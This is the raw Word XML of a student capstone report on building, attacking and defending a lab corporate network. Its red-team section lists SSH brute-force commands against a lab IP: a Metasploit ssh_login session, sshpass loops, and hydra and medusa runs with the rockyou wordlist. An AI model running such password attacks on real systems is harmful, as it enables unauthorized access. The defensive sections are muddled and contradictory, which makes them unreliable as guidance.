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93F32" w14:textId="73754ACF" w:rsidR="007D7474" w:rsidRDefault="007D7474">
      <w:r>
        <w:t xml:space="preserve">Build, attack, and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Defend</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a corporate Network </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235DACB0" w14:textId="37D8ED02" w:rsidR="007D7474" w:rsidRDefault="007D7474">
      <w:r>
        <w:t>capstone project report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D47145" w14:textId="584C8962" w:rsidR="007D7474" w:rsidRDefault="007D7474">
      <w:r>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173550C7" w14:textId="32B429BB" w:rsidR="007D7474" w:rsidRDefault="007D7474">
      <w:r>
        <w:t xml:space="preserve">This project, document the deployment, attack, and defense of a small corporate network in a controlled lab environment, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the  aim</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was to simulate corporate real-word enterprise security operation by combining </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Red</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> team offensive techniques with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Blue</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> team defensive monitoring and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>response .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> over a five-days period</w:t>
      </w:r>
      <w:r w:rsidR="0025701A">
        <w:t>, the network was built, and the attack was initiated across the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7005320F" w14:textId="2C940E47" w:rsidR="0025701A" w:rsidRDefault="0025701A">
      <w:r>
        <w:t xml:space="preserve">DAY 1: VULNERABILITY Discovery (RED TEAM) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0760A5B3" w14:textId="21C1728F" w:rsidR="00C72ABD" w:rsidRDefault="0025701A">
      <w:r>
        <w:t>THE red team conducted reconnaissance using Nmap, OSINT framework techniques, and web enumeration tools. All port close but able to break true (SSH</w:t>
      </w:r>
      <w:r w:rsidR="00DA5A3B">
        <w:t xml:space="preserve"> port </w:t>
      </w:r>
      <w:r>
        <w:t>22)</w:t>
      </w:r>
      <w:r w:rsidR="00DA5A3B">
        <w:t xml:space="preserve"> is only port that is vulnerable and week authentication mechanism and outdated services.! Here are some of the tools used to break through (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DA5A3B">
        <w:t>ssh )which</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DA5A3B">
        <w:t xml:space="preserve"> is port 22…</w:t>
      </w:r>
      <w:r w:rsidR="00C72ABD">
        <w:t xml:space="preserve"> this attack was conducted using my ubuntu server.!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F2AA9B" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD">
      <w:r>
        <w:t>……1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>…..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="42A0F611" w14:textId="2179CE79" w:rsidR="00DA5A3B" w:rsidRDefault="00DA5A3B">
      <w:r w:rsidRPr="00DA5A3B">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA5A3B">
        <w:t>sh -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA5A3B">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA5A3B">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA5A3B">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA5A3B">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA5A3B">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA5A3B">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA5A3B">
        <w:t>traditional_ssh_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA5A3B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00C72ABD" w:rsidRPr="003A22A9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ubuntu@10.48.132.80</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E0241D4" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:r>
        <w:t>…….2……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA8ED71" w14:textId="633A48A8" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; use auxiliary/scanner/ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DA9CE2F" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> auxiliary(scanner/ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &gt; set RHOSTS 10.48.132.80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6657BB83" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:r>
        <w:t>RHOSTS =&gt; 10.48.132.80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC173A5" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> auxiliary(scanner/ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &gt; set USERNAME ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E5FB9" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:r>
        <w:t>USERNAME =&gt; ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012B33CC" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> auxiliary(scanner/ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &gt; set PASS_FILE /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716EC8B0" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:r>
        <w:t>PASS_FILE =&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4215EEE4" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> auxiliary(scanner/ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &gt; set THREADS 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7A75DF" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:r>
        <w:t>THREADS =&gt; 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B08CC13" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> auxiliary(scanner/ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &gt; set STOP_ON_SUCCESS true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B89A322" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:r>
        <w:t>STOP_ON_SUCCESS =&gt; true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A442BF7" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> auxiliary(scanner/ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145769B1" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve">[*] 10.48.132.80:22 - Starting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="787E5F4C" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve">[*] Scanned 1 of 1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hosts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0D515F" w14:textId="231AE910" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:r>
        <w:t>[*] Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF4160B" w14:textId="77777777" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve">……3……. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB88D3B" w14:textId="51FE9630" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72ABD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72ABD">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72ABD">
        <w:t xml:space="preserve"> --script ssh2-enum-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72ABD">
        <w:t>algos,ssh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72ABD">
        <w:t>-auth-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72ABD">
        <w:t>methods,ssh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72ABD">
        <w:t>-hostkey 10.48.132.80 -p 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E6F10D" w14:textId="7BFAAC2D" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve">……4…. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4970AA" w14:textId="188C121F" w:rsidR="00C72ABD" w:rsidRDefault="00C72ABD" w:rsidP="00C72ABD">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72ABD">
        <w:t>sshpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72ABD">
        <w:t xml:space="preserve"> -p "$u" ssh -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72ABD">
        <w:t>strictHostKeyChecking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72ABD">
        <w:t>=no $u@10.40.132.80 "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72ABD">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72ABD">
        <w:t>; id" &amp;&amp; break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23624076" w14:textId="1875A132" w:rsidR="00C72ABD" w:rsidRDefault="006F3707" w:rsidP="00C72ABD">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>…..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">5……. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E639F73" w14:textId="3EDAEC0D" w:rsidR="006F3707" w:rsidRDefault="006F3707" w:rsidP="00C72ABD">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>sshpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t xml:space="preserve"> -p "${u}password" ssh -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>StrictHostKeyChecking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>=no $u@10.4</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="006F3707">
        <w:t>.132.80 "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>; id" &amp;&amp; break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01308122" w14:textId="7E594EA9" w:rsidR="006F3707" w:rsidRDefault="006F3707" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve">…….6…… </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8BFEF3" w14:textId="530F1F94" w:rsidR="006F3707" w:rsidRDefault="006F3707" w:rsidP="00C72ABD">
      <w:r w:rsidRPr="006F3707">
        <w:t>ssh -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>vvv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t xml:space="preserve"> root@10.48.132.80 2&gt;&amp;1 | grep -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t xml:space="preserve"> "auth"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC03EE8" w14:textId="39413651" w:rsidR="006F3707" w:rsidRDefault="006F3707" w:rsidP="00C72ABD">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>sshpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t xml:space="preserve"> -p "$user" ssh -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>strictHostKeyChecking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t xml:space="preserve">=no -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>connectTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>=5 "$user@10.0.48.133" 'id' 2&gt;/dev/null &amp;&amp; break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D093A6" w14:textId="1DD4E9C5" w:rsidR="006F3707" w:rsidRDefault="006F3707" w:rsidP="00C72ABD">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>nv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t xml:space="preserve"> 10.48.132.80 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3092631A" w14:textId="1D2AFCC7" w:rsidR="006F3707" w:rsidRDefault="006F3707" w:rsidP="00C72ABD">
      <w:r w:rsidRPr="006F3707">
        <w:t>ssh -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>vvv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t xml:space="preserve"> root@10.48.132.80 2&gt;&amp;1 | grep -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t xml:space="preserve"> "auth"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F3B176" w14:textId="1AB53436" w:rsidR="006F3707" w:rsidRDefault="006F3707" w:rsidP="00C72ABD">
      <w:r w:rsidRPr="006F3707">
        <w:t>hydra -L -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>/share/wordlists/rockyou.txt ssh://10.48.132.80 -t 4 -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B799E7" w14:textId="73F95F22" w:rsidR="006F3707" w:rsidRDefault="006F3707" w:rsidP="00C72ABD">
      <w:r w:rsidRPr="006F3707">
        <w:t>enum4linux -a 10.48.132.80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFB0E3" w14:textId="4737CBEE" w:rsidR="006F3707" w:rsidRDefault="006F3707" w:rsidP="00C72ABD">
      <w:r w:rsidRPr="006F3707">
        <w:t>medusa -h 10.48.132.80 -u root -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3707">
        <w:t>/share/wordlists/rockyou.txt -M ssh -t 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400C1200" w14:textId="457931F0" w:rsidR="006F3707" w:rsidRDefault="008A3849" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve">………! </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the help </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>this ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> am able to achieve my target on day 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472F15C6" w14:textId="77777777" w:rsidR="008A3849" w:rsidRDefault="008A3849" w:rsidP="00C72ABD"/>
    <w:p w14:paraId="4FEA9B4A" w14:textId="2CE0CD42" w:rsidR="008A3849" w:rsidRDefault="008A3849" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve">DAY 2: HARDENING and MONITORING </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19017A31" w14:textId="0A363C81" w:rsidR="008A3849" w:rsidRDefault="008A3849" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve">Attack hardening was applied across all system using industry best practices, which is IP address and was able to find an excellent gateway to break in and also system </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>were</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> secured ubuntu-web server</w:t>
      </w:r>
      <w:r w:rsidR="00CE27CD">
        <w:t xml:space="preserve"> using group policy,</w:t>
      </w:r>
      <w:r w:rsidR="0034025C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0034025C">
        <w:t xml:space="preserve">And </w:t>
      </w:r>
      <w:r w:rsidR="00CE27CD">
        <w:t xml:space="preserve"> restricted</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CE27CD">
        <w:t xml:space="preserve"> administrative access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656D40B8" w14:textId="77777777" w:rsidR="00CE27CD" w:rsidRDefault="00CE27CD" w:rsidP="00C72ABD"/>
    <w:p w14:paraId="78A26B81" w14:textId="2519AF77" w:rsidR="00CE27CD" w:rsidRDefault="00CE27CD" w:rsidP="00C72ABD">
      <w:r>
        <w:t>DAY 3: NETWORK DESIGN AND LAB BUILD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DF44FB" w14:textId="15BCD935" w:rsidR="00CE27CD" w:rsidRDefault="00CE27CD" w:rsidP="00C72ABD">
      <w:r>
        <w:t>A corporate network was design</w:t>
      </w:r>
      <w:r w:rsidR="001D1D26">
        <w:t xml:space="preserve">ed </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with the help of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>WAZUH ,SURICATA</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,OPNSENSE/PFSENSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2514B8DD" w14:textId="19140B93" w:rsidR="00CE27CD" w:rsidRDefault="00CE27CD" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve">ALL the required tools were </w:t>
      </w:r>
      <w:r w:rsidR="002D2063">
        <w:t xml:space="preserve">successfully download and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D2063">
        <w:t>verified .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4FF926A0" w14:textId="77777777" w:rsidR="002D2063" w:rsidRDefault="002D2063" w:rsidP="00C72ABD"/>
    <w:p w14:paraId="430BD563" w14:textId="208CCE51" w:rsidR="002D2063" w:rsidRDefault="002D2063" w:rsidP="00C72ABD">
      <w:r>
        <w:t>DAY 4: ENVIRONMENT MONITORING USING SNORT TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4125F513" w14:textId="77777777" w:rsidR="001D1D26" w:rsidRDefault="001D1D26" w:rsidP="00C72ABD"/>
    <w:p w14:paraId="4F5E7363" w14:textId="77777777" w:rsidR="001D1D26" w:rsidRDefault="002D2063" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve">The environment </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>were</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> carefully secured using snort </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rule ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> R</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1,H5,H10,R1  TO</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  secure the system files not to be leaked out or downloaded by extracting the sensitive information related to </w:t>
      </w:r>
      <w:r w:rsidR="001D1D26">
        <w:t>system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656420BA" w14:textId="165B8087" w:rsidR="001D1D26" w:rsidRDefault="001D1D26" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve">CONCLUSION </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAD6731" w14:textId="49E63BB1" w:rsidR="001D1D26" w:rsidRDefault="001D1D26" w:rsidP="00C72ABD">
      <w:r>
        <w:t xml:space="preserve">Capstone project </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on experience in both offensive and defensive cybersecurity by simulating a realistic corporate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>environment ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the project </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>reinforce</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the interconnected nature of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>administrative  network</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> security between penetration testing and incident response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543C3713" w14:textId="77777777" w:rsidR="00CE27CD" w:rsidRDefault="00CE27CD" w:rsidP="00C72ABD"/>
    <w:p w14:paraId="10A1DE7B" w14:textId="77777777" w:rsidR="008A3849" w:rsidRDefault="008A3849" w:rsidP="00C72ABD"/>
    <w:sectPr w:rsidR="008A3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74"/>
    <w:rsid w:val="001D1D26"/>
    <w:rsid w:val="0021638E"/>
    <w:rsid w:val="0025701A"/>
    <w:rsid w:val="002D2063"/>
    <w:rsid w:val="0034025C"/>
    <w:rsid w:val="00447918"/>
    <w:rsid w:val="006F3707"/>
    <w:rsid w:val="007D7474"/>
    <w:rsid w:val="008A3849"/>
    <w:rsid w:val="00BF4992"/>
    <w:rsid w:val="00C72ABD"/>
    <w:rsid w:val="00CC43C9"/>
    <w:rsid w:val="00CE27CD"/>
    <w:rsid w:val="00DA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C8E1D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0787747C-41B9-4EAA-B65A-7AF045D3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A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buntu@10.48.132.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ominiyi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>enoch ominiyi</cp:lastModifiedBy>
